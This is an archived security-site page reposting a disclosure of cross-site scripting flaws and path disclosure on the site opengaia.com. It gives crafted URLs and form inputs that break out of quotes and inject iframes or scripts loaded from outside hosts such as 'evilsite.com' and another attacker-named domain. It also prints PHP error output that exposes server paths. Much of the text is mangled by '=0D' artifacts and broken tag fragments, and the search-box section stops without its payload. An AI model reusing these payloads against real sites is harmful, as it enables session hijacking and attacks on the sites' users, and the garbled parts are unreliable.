Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Specific Sites :: b06-2914.htm

Opengaia.com - XSS Vuln & Session Include



Opengaia.com - XSS Vuln & Session Include
Opengaia.com - XSS Vuln & Session Include



Opengaia.com=0D
=0D
Homepage:=0D
http://www.opengaia.com=0D 
=0D
Effected files:=0D
my_page.php=0D
module.php=0D
editing your profile=0D
the search input box=0D
adding a diary/blog=0D
=0D
------------------------------------=0D
=0D
Just like in onlinenode.com's vulnerabilities, it seems this site filters data just about the same. Below is one way to create a XSS vuln by closing quotes and using an open ended iframe.=0D
=0D
'>'>
&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274=0D">http://www.opengaia.com/my_page.php?viewed_id=6871">'>'>
&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274=0D
=0D tags also workin each .php file. Example:=0D =0D <'<"">=0D">http://www.opengaia.com/my_page.php?viewed_id=6871''"<"'><'<"">=0D =0D =0D Module.php XSS Vuln:=0D =0D It seems with this code, we'll get a php error with full path disclosure and the xss won't work:=0D =0D http://www.opengaia.com/modele.php?connection=1&name=%27%27%22%3C%22%27%3E%3Ciframe%2520src%3Dhttp%3A%2F%2Fevilsite.com%2Fscriptlet.html%2520%3C%5C=0D =0D Warning: main(./): failed to open stream: Success in /home/user/public_html/modele.php on line 243=0D =0D Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 243=0D =0D Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/encoree/public_html/modele.php on line 243=0D =0D Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247=0D =0D Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247=0D =0D Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/user/=0D =0D public_html/modele.php on line 247=0D =0D modele.php XSS Vuln using iframe tag:=0D =0D http://www.opengaia.com/modele.php?connection=1&name=%22%3E%27%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%22&password=&object_menu=&right=accueil.php&left=bienvenue.php&page=home&viewed_id=&fond=cccccc&langue=en&object_type=&filtre==0D =0D -------------------------------------=0D =0D Editing your profile XSS with PHP Session included:=0D =0D It seems the input boxes of editing your profile don't properlly filter user input before generating it. For a PoC example =0D =0D we will use end tags and put <"<"">=0D">SRC=http://www.youfucktard.com/xss.js><"<"">=0D =0D Screenshots of PoC in action:=0D =0D http://www.youfucktard.com/xsp/gaia2.jpg=0D http://www.youfucktard.com/xsp/gaia3.jpg=0D http://www.youfucktard.com/xsp/gaia3.jpg=0D =0D -----------------------------------=0D =0D Search input box XSS Vuln PoC:=0D =0D in the search boxtry putting:=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH